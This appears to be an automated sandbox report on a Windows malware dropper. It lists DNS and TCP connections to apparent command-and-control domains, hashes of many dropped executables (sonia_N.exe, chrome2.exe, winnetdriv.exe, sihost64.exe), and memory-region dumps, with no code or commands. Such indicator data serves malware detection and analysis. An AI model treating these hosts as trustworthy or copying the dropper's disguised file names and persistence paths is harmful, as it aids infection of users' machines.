US 8.8.8.8:53 ataninamei.xyz udp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 10.173.189.20.in-addr.arpa udp
US 3.20.137.44:443 live.goatgame.live tcp
US 3.20.137.44:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 44.137.20.3.in-addr.arpa udp
NL 212.193.30.115:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 ataninamei.xyz udp
US 3.141.96.53:443 live.goatgame.live tcp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 4f9c26e4bce33e121d62134abfa3bddf
SHA1 d48594bf70c80c2d60b9158f85823db5cf39d76a
SHA256 45af78e7721211c6de7ec350c00e8801a293390ed9a35bf2c9ef7267ce93c749
SHA512 f7e495a2d6d26028b74c330ba052f2424f4bd8264168b240ac6f73e71a1bf850b44c7ec01b00187b210009e1da6fb7cf577511de8a3735fba2603d55c679ddc8

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 18f49152f4673f009cfbbc1180976fba
SHA1 6d9a1f6e77ac6cc44810e66895f7db7f587af968
SHA256 55751b05ca20ea14a635da0d1bc6f766a5a15fd5a7193738beaff26aede8be94
SHA512 6299e11f77a01f752c28e3ce73e9d744bd7c75ee320786a6a89cce522613352105b0f37786d881fb48c2af5d6950d51c929623ff951e3e3c0b1e45f64d23ddcc

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 2a12b812dcb4a761a3602955c60517ef
SHA1 051391cb8899e54d0a3b943682b0cd67170f97ad
SHA256 6baa3f86b4030e6290563f61a18331b3b2e8dc0953140334acd8e633ab6974f4
SHA512 15b0dec808364af790af4233fd10e94c0e46b56cff8faebc12bc6dcbd60ed59f7fad997acfc3075f027ec97cba4bc5c88e36e04bcec56850721cb3fd32123029

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe

MD5 7a82c73b9a1b6bf3d2aefe2f3740a564
SHA1 1debd41cb9589c9ebc50b0e370d6d8da565be370
SHA256 35a72b874265e4109dd7d94a37c4417b8fb71a158c4ad10100ef112480b4a8bf
SHA512 61c110e3f12b31fb429afc2fc5b074ab6d4665a8e1b716660bc3f4ef8360ab4187d6137b553430e104998307a849ac9a5db206a2ac20665e890e9bb4c88d6787

memory/2176-48-0x0000000000400000-0x000000000051D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\libgcc_s_dw2-1.dll

MD5 8cc9060d4fc1d5eef98249f47d39c746
SHA1 4777821114af24861c3095eb3ac9c89b70ca8b38
SHA256 bf973bee3d88590702e079641505072223eec169aed8117328ba7e75c496c8ab
SHA512 f26d012695eec4225aea2eb7affd73008faf2b02c11c18c678b79d593ae578000e3317b054768a4777e6ca982edfb806772675e198b0bc4d8d3c2c8420caa2c9

memory/2176-60-0x0000000000400000-0x000000000051D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2176-62-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2176-63-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2176-64-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2176-65-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2176-66-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2176-68-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2176-70-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2176-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2176-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2176-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2176-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2176-76-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2176-75-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2176-79-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2176-82-0x0000000000400000-0x000000000051D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_7.txt

MD5 e17c0faa31daa0a67304020496a5628e
SHA1 55458ee48312567c657dac7e324cdbca338928cd
SHA256 a60008adf056b92195c60d9e22435b863b6c1f1d40e12e5d830a28e3831166c1
SHA512 d8452fee7794ca810894e11c5b0b8227b30c8cd707b3ae64a9b29abb7bad0d3f1e1e8a9aeaab43a1c17cca854e5b9c40885db8a4a8730affaa303e4682dc718a

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_6.txt

MD5 e1ccf1fd5a4e6c1edb774a42ccee2b7b
SHA1 67ba5d76ea49aa6dc3d94027966a05c4c8adfabd
SHA256 be958aa7672b7eeabd668cd8c0893eb22b84ab490dbef447b142e191b4ef97e0
SHA512 cbc421b0e803cf1fd85171fc653fc5c26f45aaa02971cec2000d3c0d7fead07f39300ccbe3c11b21bd0938baca95b32d95235926c86f02677594378bc97ad8b0

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_5.txt

MD5 e067b0b74aff3609d8f71ff7375f25d7
SHA1 8857195018560d431a0f7ad1f8fac1a059e3a38e
SHA256 b3e2deaa9fdeac58349018c5415efb53c7b3397ceef77bf0d83ada5a627c8f11
SHA512 1afdb77379ffceb07c4906a2ab22da6ec6c0b1dd908b7b45f18deb736aa92cb5d8ec706f252a62a064bae70746260239c30f7a460413fe730d25db5b77465bc2

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_4.txt

MD5 ada981fe0dabe48e105f5314cfd34a4e
SHA1 d4d04f50c57e7b296ec7e2548bf3359a5af9c209
SHA256 c75e7758abf7f8d9988df114ff6c8d30028a4c3e18a3b1113f892781b657a85d
SHA512 aec0dc9e9ecad1121bef197ec0a66ba17dda17bf78d9e6d44ef20efe436dd39b5069538dcb3eef7c4f963594bd2d6949d359dfb371042111e26b6a7910931b05

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_3.txt

MD5 2196970ef6c6bd1d8c78a3016965c145
SHA1 17cb07e0ee5ee82f7fe4820bd3422cc9c4eeb487
SHA256 236cf5afe5c36318a696b3a72f12e5e6559ceed1faf08eecf8542e8077b6c94c
SHA512 fceee96e27bb4337d7f89f3e439bde62b251501966549384a4fa9bda5ae1f852558bed76b5d0dcca454ad2499ab26c78001794653209b900fca1c2f69df0b927

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.txt

MD5 c0d18a829910babf695b4fdaea21a047
SHA1 236a19746fe1a1063ebe077c8a0553566f92ef0f
SHA256 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98
SHA512 cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_2.txt

MD5 df63a9bc141064c6115fcc889abf3b8c
SHA1 040d6ed844e41647fbc0ee0ad5db14bb94b50131
SHA256 c9f36e88dac9aa0c0653df695e3e50a123fb0dd63692312d5cacbf5479530446
SHA512 3270ce7f1d4da1b4e88264b439f82bd1e95e3ef1549b90edcfdc6fadd50bb12bda8fcbb0144f5902b2339f8834d3b9b0686591708cbd655d40dd093c2976a815

memory/2176-81-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2176-80-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2176-78-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2176-77-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2176-69-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2176-67-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_9.txt

MD5 6890dcc70fef18b23b63767aeb7a70bb
SHA1 4f759828e49f3e666980444f5694ed43bef6ae70
SHA256 9ac8cb29aa93571f2ee47202c9e42720026a00526b18b96b9a8f91a8c7b2431e
SHA512 0789728ab08f70458005c23c2e08542fe97948ffb696ce8d3049aa45c3d6cc2ab5c6d6beea5fc481b287e9e97b8353026eff3eedfdf52f4484c389c6bb0f2150

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_2.exe

MD5 b61e7c8808a6aeff45299b2524cb1a95
SHA1 6595885d9cac2764bb57f1cbaff23ee9e35d1f74
SHA256 bef345787002b93d2b863e7e338e2f462afe7990e7b0ba6bf5effaf30b829be7
SHA512 92a710b42738b07bd9342072966acbb602b8c19ebf744d7274ba8f08e3b8a185b48094485c4bb4ec1e23cbec84634368a5d000f4c045cf4a37a3c359a391f119

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_4.exe

MD5 6256324adebccae067063ec64619ec01
SHA1 15f5c6590e0295f9f6f54a1bfc3988c17b1345d0
SHA256 6f7a65da9fb30461ba43208e499f34b360881563eb339af38dc67a2d47017c4e
SHA512 9c7832468dc6dc9e6f986258ade1d621d512ac69847f22c08822d5ba21d46b44f6e9bce976c32116331b704216a9584def2fa4ce662a4899e9d4b5d826157958

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_5.exe

MD5 761ce037cbee9dd5ab4618525988496c
SHA1 a52d2865df04c93e1d31c382073eb7fb323ab998
SHA256 9545fad741b79a7e1237d7e4ebc4f783de408bbbdacb61eec50f921f28bdb7b9
SHA512 fb82f5cabcaf353ac5d11e29f7c85aea77aba3fd9357546e8d249f0f7df76ae24d718a4035a864ed8fbf6d573f3557b407d701c1e2997c7bf73953ef4dd02143

memory/4748-102-0x0000000000120000-0x000000000020E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_9.exe

MD5 5ee7e1b0262fe354ae7f09806c1b01e3
SHA1 e883419707a4641296fa1c9a5df328c68a1405c3
SHA256 fcc24753aa8844438ff479f54b951d699337e8f022eb2964d1e8cb3b6012e9d9
SHA512 ec580e667c5895f4576f0c79fc24be8712fa970ea2b07a04675fdad2725ad4562115f73955b5e08794a6c00e89d7d5e96eece8778b9333c8e0abf9b3a363ebe2

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_7.exe

MD5 e5b337a345d9e81b9087c295aa2b4136
SHA1 fcd8e4027099371dca95148efa06fb7e4a4812c3
SHA256 c232b872e2d9d97be812d323dad87d4201365bdf64cdaae3a51d2c3a691534f2
SHA512 77244dbd3b581240334580cef76343cea2ed1f0ee86ad97aa167b5b751ed00c97b4d5a16ebcac4ad41b561313baa9204755e20abc601ca803d7854287b2d4cfc

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_8.exe

MD5 48f54e05963f2f9fac356613b4fae183
SHA1 3fb94918bd982df89c44ce37d82e602814a390fd
SHA256 83283877a323769ce2195a92eafd8865143ea05612445b4583af9a7ad2192b93
SHA512 217851ae0f056c031e7e89f3668688eea41856472133451d04238acd5b26b7c6a8996663c148e235a6b20ec9f2c337f33e4dd15929700d5d5085191e85a48282

memory/4748-107-0x0000000073910000-0x00000000740C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_6.exe

MD5 222d4200d6c2b73ff813c472574fa8a8
SHA1 ff5af087d33986ea371d037831f4152f9941f165
SHA256 0fe761e033e51ccb97cd7af67cbe872f820dd4959b281af81976681b5afc0aa8
SHA512 0a1ed129fd88290bbf953d38dd8a1b0a7885e9307e964bc1fadcade5d07543ffe3bfef54cefffd9fde4fee7c6388536589c88ae76ce99d6663ef3c462729929b

memory/4400-109-0x0000000000740000-0x00000000007AA000-memory.dmp

memory/1588-100-0x0000000000400000-0x000000000046D000-memory.dmp

memory/4400-111-0x0000000073910000-0x00000000740C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_3.exe

MD5 d5150e7c78eac749b00f0c0d803914f4
SHA1 ff00396e2d2c029738453ec66bf63a8d39512c83
SHA256 61e83ca939ee966f83663418b9bc88987370f25ee5f1897c4928507be5c54332
SHA512 8d891f3986952ec0a065287f36ef6ae4366e09501c587b45f993c6353111e1d326431d586e3aed5e6f843a627b635bd460c31efd4ce801a82d675c52bf6d5e60

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_8.txt

MD5 7c61996bdaf647b491d88063caecbf0c
SHA1 38f6448a659e294468ee40f7dfebf1277c3771f1
SHA256 de67bb06f8462526665e4b791f5b90f3e2c248eec21f4cab5954b322eed25d46
SHA512 c92cb5711ce691c4cca9e786172e713ce5da7c463ebe0e2973ce0d63454faafb568c99e90f182839b06e4103a1bf361eb9089a5b9125b04e38a9f35a949780cc

memory/4400-115-0x0000000004FE0000-0x0000000005056000-memory.dmp

memory/1272-113-0x00000000002C0000-0x00000000002FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-QVQSG.tmp\sonia_5.tmp

MD5 2c06923b75f6d7aa0df4741a7ba85f1c
SHA1 4fce80e37e0e80d29714d05f7b124bdb739680d6
SHA256 d764f0742ffcb83e50ab55922d6985944ad4e09a385c9422c0d289a225912d71
SHA512 e4e0358afdf661eed95e81be486016ed83cdc646c06e75865fe8add419d795f0b35bd3d8a8c7c38ad93cfe8856311e0a5a86c162ee9c4af10505d2fdd2421d27

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

C:\Users\Admin\AppData\Local\Temp\is-MNNL2.tmp\idp.dll

MD5 8f995688085bced38ba7795f60a5e1d3
SHA1 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

memory/4400-134-0x0000000004F80000-0x0000000004F9E000-memory.dmp

memory/2176-138-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2176-139-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1272-132-0x00007FF95DC60000-0x00007FF95E721000-memory.dmp

memory/2176-140-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2176-141-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2176-143-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2176-142-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/3420-147-0x0000000000DF0000-0x0000000000E00000-memory.dmp

memory/1272-144-0x0000000002360000-0x0000000002388000-memory.dmp

memory/8-145-0x0000000000400000-0x0000000002C67000-memory.dmp

memory/1588-151-0x0000000000400000-0x000000000046D000-memory.dmp

memory/3756-150-0x0000000000400000-0x0000000002CC3000-memory.dmp

memory/8-152-0x0000000002DD0000-0x0000000002DD9000-memory.dmp

memory/3756-154-0x0000000004960000-0x00000000049FD000-memory.dmp

memory/3756-153-0x0000000002E20000-0x0000000002F20000-memory.dmp

memory/3756-155-0x0000000000400000-0x0000000002CC3000-memory.dmp

memory/4400-157-0x00000000051B0000-0x00000000051C0000-memory.dmp

memory/4780-156-0x0000000000670000-0x0000000000671000-memory.dmp

memory/3420-158-0x00007FF95DC60000-0x00007FF95E721000-memory.dmp

memory/8-159-0x0000000002FF0000-0x00000000030F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 99c083660d4b4e64464340356b5ce089
SHA1 a43322664ec72560353cbf2d6b68b3463a4690df
SHA256 96302eeeb96f5adb537d80be490e969e5bc94c9f8298eee4e75ee2897724152e
SHA512 0cd54e652f13dbc7c3242b8ffcfaa15574988b9aacf96fddc4525941302c7086bff187b92a8e9f2318c25edfa0b1a7fb9e1ce4441bb8e72abed0aa67776a0d34

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 a155e7e91cd053878f30ea6380390829
SHA1 378c96c67b2559d285d1aa09afe62a1360954132
SHA256 66d98ee6c310e5546ad81a575556693bfa9772e7f034defedffec421592a324e
SHA512 2e35784dfa68a72043accbda4816d51a917a8bd73027c5c72d5e8b46d90ad7a4e31e343b823b309bc94f1732abf0269a19081e2c9d80ef199a50c4c68c31bc84

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

MD5 7fee8223d6e4f82d6cd115a28f0b6d58
SHA1 1b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256 a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA512 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 6655bffb8dc5169b2eae54d6a291c12f
SHA1 4652f396cfdd85f4a36417c27076fac240b47c2b
SHA256 851cda9da7d01efddc92ed29fb6b7408414bf37c01fb9690a2101c61249b9456
SHA512 81c54c1339c0998c3d5ecf5d9a99c00846d1a3f4514ebeb55230c4ca09454b902b72dd61620915df1a39417ed9a768a6c82c6e3acadb0cd8938db6dbf9e95dc2

memory/3428-168-0x0000000002C50000-0x0000000002C66000-memory.dmp

memory/8-170-0x0000000000400000-0x0000000002C67000-memory.dmp

memory/4764-173-0x0000000000400000-0x00000000004E4000-memory.dmp

memory/4464-176-0x0000000000400000-0x000000000045B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

MD5 1ac43adad3d56d5fc4f0fe0fe0f3c223
SHA1 af5ee0392384cf4de06d11df7aecbde45684568a
SHA256 7e2b36a203c77f68048348badce4715fa319eadf127f340a1814493d48646fa4
SHA512 934435fc6b6dfb0496797e5649b55929b027ba3b0be748ef0fe36d087c10c4aafbf3fbf03358f9c2eca3c332941b2338ccb8f81d3cb85134dafe4a9408a5e573

memory/3936-185-0x0000000000400000-0x000000000045B000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 c7c97b7b062c74ce88a91cec3897f388
SHA1 6ba914c0fb71c3ce616004433ae4bc37deebad63
SHA256 275fc21c896187ab3c3c3571d8d3d570157ff30c8907931fecec8e22c8f0e87e
SHA512 d72e78b49053edcfa26ae99ee6cc3791bdb422c8d6e02094efac5d8eff095d301972030e4f56ce4a188eeaa0a78a3e12a4a491d3e982fba1372c841699bbb3b0

C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

MD5 b7161c0845a64ff6d7345b67ff97f3b0
SHA1 d223f855da541fe8e4c1d5c50cb26da0a1deb5fc
SHA256 fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66
SHA512 98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

memory/4780-195-0x0000000000400000-0x0000000000516000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 eb0c098d8c513b0795f6adc2f85056c4
SHA1 6a0be3d37ca7b2689990e05f703400c03a6ba61f
SHA256 8ce4a8efed4c98bd5c94e40735e2388dd705d9e4cfeb36657d9c87d670e85212
SHA512 3f9920bb8b726e61567cf3862e53866c895b078ce91079db57c6a63f33e265437331ca0177ed7b04d06e14128cf9130c84412befd67cace4125c2290e35a23c8

memory/4748-197-0x0000000073910000-0x00000000740C0000-memory.dmp

memory/3756-196-0x0000000000400000-0x0000000002CC3000-memory.dmp

memory/1272-218-0x0000000002350000-0x0000000002360000-memory.dmp

memory/924-219-0x0000000000400000-0x000000000045B000-memory.dmp

memory/4968-227-0x0000000000400000-0x000000000045B000-memory.dmp

C:\Users\Admin\AppData\Roaming\raasgsw

MD5 b1f48224b74bd5789edda9e910eef29f
SHA1 7b4271d40384d41bff8928c476020abfe70490f6
SHA256 b7e9740c81b1b49e8d3f49ec79717f4282bdf307d393d143a92e36f1abf09aa6
SHA512 58edcb222a69030ba6a94a5f545a8602e16a95c74ac9cbc92681f993602829791f7d14272d631894557819525607434678c000906379db8b9ca867a9e60b7209

memory/4400-232-0x0000000005940000-0x0000000005EE4000-memory.dmp

memory/4400-242-0x0000000073910000-0x00000000740C0000-memory.dmp

memory/3756-254-0x0000000002E20000-0x0000000002F20000-memory.dmp

memory/1272-252-0x00007FF95DC60000-0x00007FF95E721000-memory.dmp

memory/3500-255-0x0000000000400000-0x000000000045B000-memory.dmp

memory/2516-251-0x0000000000400000-0x000000000045B000-memory.dmp

memory/5108-258-0x0000000073910000-0x00000000740C0000-memory.dmp

memory/5108-263-0x0000000000400000-0x000000000041E000-memory.dmp

memory/5108-270-0x00000000052C0000-0x00000000058D8000-memory.dmp

memory/5108-275-0x0000000004D30000-0x0000000004D42000-memory.dmp

memory/1088-276-0x0000000000400000-0x000000000045B000-memory.dmp

memory/5108-278-0x0000000004DD0000-0x0000000004E0C000-memory.dmp

memory/4400-271-0x0000000073910000-0x00000000740C0000-memory.dmp

memory/3892-269-0x0000000000400000-0x000000000045B000-memory.dmp

memory/1272-268-0x00007FF95DC60000-0x00007FF95E721000-memory.dmp

memory/5108-285-0x0000000004E10000-0x0000000004E5C000-memory.dmp

memory/5108-284-0x0000000004F80000-0x0000000004F90000-memory.dmp

memory/2176-291-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2176-292-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2176-293-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2176-290-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/5108-294-0x00000000050A0000-0x00000000051AA000-memory.dmp

memory/3420-302-0x0000000001D80000-0x0000000001D92000-memory.dmp

memory/3420-300-0x00000000017A0000-0x00000000017AE000-memory.dmp

memory/3420-301-0x000000001D210000-0x000000001D220000-memory.dmp

memory/3420-315-0x00007FF95DC60000-0x00007FF95E721000-memory.dmp

memory/3468-316-0x00007FF95DC60000-0x00007FF95E721000-memory.dmp

memory/5108-319-0x0000000073910000-0x00000000740C0000-memory.dmp

\??\c:\users\admin\appdata\local\temp\is-qvqsg.tmp\sonia_5.tmp

MD5 c5fa684642070d3ab3efef47da58d28e
SHA1 af355ec4fc0f122e0e3506fadabf582f4d6596c3
SHA256 7bed8150acf8d5b56701429cce7ed02af18b4cd543fff879af6b2bbe4521eac1
SHA512 38059a5f563197518738b77d86f09c10f1ff026af336f130b09b693bcfe8af85c799f3a66192168a4588f09583069674885c5bddf277d7d2fb2f4db9ddeeade1

memory/1588-326-0x0000000000400000-0x000000000046D000-memory.dmp

memory/5108-327-0x0000000004F80000-0x0000000004F90000-memory.dmp

memory/3468-328-0x00007FF95DC60000-0x00007FF95E721000-memory.dmp

memory/3468-329-0x000000001C4F0000-0x000000001C500000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 be0b4b1c809dc419f44b990378cbae31
SHA1 5c40c342e0375d8ca7e4cc4e1b81b7ef20a22806
SHA256 530bd3b9ec17f111b0658fddeb4585cd6bf6edb1561bdebd1622527c36a63f53
SHA512 5ce316cfe5e25b0a54ceb157dee8f85e2c7825d91a0cd5fae0500b68b85dd265903582728d4259428d2e44b561423dac1499edcf0606ac0f78e8485ce3c0af24

memory/4964-344-0x0000000000DA0000-0x0000000000DA6000-memory.dmp

memory/4964-346-0x0000000001BE0000-0x0000000001BF0000-memory.dmp

memory/4964-345-0x00007FF95DC60000-0x00007FF95E721000-memory.dmp

memory/3468-347-0x000000001C4F0000-0x000000001C500000-memory.dmp